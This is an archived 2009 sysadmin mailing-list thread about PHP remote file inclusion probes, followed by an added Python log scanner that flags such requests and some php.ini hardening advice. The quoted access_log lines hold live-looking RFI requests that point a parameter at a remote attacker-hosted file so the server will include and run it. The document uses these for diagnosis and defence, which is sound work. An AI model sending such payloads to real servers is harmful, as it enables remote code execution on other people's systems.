[ale] Apache PHP redirect proxy type hack

Brandon Checketts brandon at brandonchecketts.com
Mon Jun 29 21:09:56 EDT 2009


The request to webpage.php that returned a 200 status might or might not
be a problem.  You should examine the PHP script and see if it is doing
anything with the $dir variable without verifying that it is safe to use.

This type of vulnerability is common in old PHP code that relies on
register_globals being enabled.  When register_globals is enabled PHP
will automatically set global variables with those passed in the GET or
POST requests.  Poorly thought-out PHP code will sometimes include()
that variable blindly and cause the page to be downloaded and executed.


Thanks,
Brandon Checketts




Ben Alexander wrote:
> Every now and then some IP address from Asia or other place hits our web
> server and is utilizing some PHP or mod_rewrite perhaps bug to proxy
> themselves to another website perhaps and use a lot of bandwidth, but
> only our outgoing it seems.
> 
> Here is an example from access_log of this (members.php is not a valid
> PHP page on the site):
> 
> 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET
> //members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt????
> HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
> 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET
> /webpage.php//members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt????
> HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"
> 
> When this happens, there are hundreds of megs of log lines like this in
> error_log:
> 
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:
>  virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to
> include 'footer.php' - error finding URI in
> /htdocs/website.com/webpage.php on line 93
> 
> [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request
> exceeded the limit of 10 subrequest nesting levels due to probable
> confguration error. Use 'LimitInternalRecursion' to increase the limit
> if necessary. Use 'LogLevel debug' to get a backtrace.
> 
> 
> Any idea how to prevent this?
> 
> Thanks,
> Ben
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://mail.ale.org/mailman/listinfo/ale
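The access_log pattern quoted above (a query parameter whose value is a complete URL, followed by a 200 with a huge byte count) is the fingerprint of a remote file inclusion probe of the kind Brandon describes. As an added example that is not part of the original thread, the Python script below parses Apache combined-format log lines, flags every request that carries a parameter pointing at a remote URL, and marks the ones that came back 200 with a large response body as the requests whose target script needs its include() handling checked. The sample lines are constructed: the two probe lines reproduce the entries from the post, the third is a made-up benign request, and the 1 MB "large body" threshold is an arbitrary assumption.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample log: lines 1-2 reproduce the access_log entries quoted in
# the thread, line 3 is a made-up benign request for contrast.
SAMPLE_LOG = """\
80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET //members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET /webpage.php//members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"
192.0.2.10 - - [27/Jun/2009:01:40:00 -0400] "GET /webpage.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"
"""

# Apache combined log format: client, ident, user, [timestamp], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# A parameter value that is itself an absolute URL is what a blind include()
# of a request variable would fetch and execute.
URL_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Assumed threshold: responses bigger than this on a 200 are treated as
# "something was actually served", not just an error page.
LARGE_BODY_BYTES = 1_000_000


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def url_params(target):
    """Return the (name, value) pairs in the query string whose value is a remote URL.

    The query string is split on the first '?' rather than with urlsplit(), because
    a target such as '//members.php?...' would otherwise be read as a host name.
    """
    query = target.partition("?")[2]
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if URL_VALUE_RE.match(value)
    ]


def classify(rec):
    """Return a finding for an RFI probe, or None if the request looks ordinary."""
    hits = url_params(rec["target"])
    if not hits:
        return None
    # A 404 means the probe hit a non-existent script; a 200 with a large body
    # (as in the second quoted line) is the one that needs the script examined.
    likely_success = rec["status"] == 200 and rec["bytes"] >= LARGE_BODY_BYTES
    return {
        "ip": rec["ip"],
        "target": rec["target"],
        "params": hits,
        "status": rec["status"],
        "bytes": rec["bytes"],
        "likely_success": likely_success,
    }


def scan(log_text):
    """Run classify() over every parseable line and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        finding = classify(rec)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        flag = "LIKELY SUCCESS" if f["likely_success"] else "probe"
        print(f"{f['ip']} {f['status']} {f['bytes']:>10} {flag}: {f['params']}")
```

Run it against the real access_log (`scan(open("/var/log/httpd/access_log").read())`) and the "LIKELY SUCCESS" entries tell you which script to read. On the PHP side, the fix for the class Brandon describes is to validate the request variable against an allowlist of local files before include(), and, in php.ini, to leave register_globals off and set allow_url_include = Off so a request variable can never pull code from a remote URL even if the check is missed.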

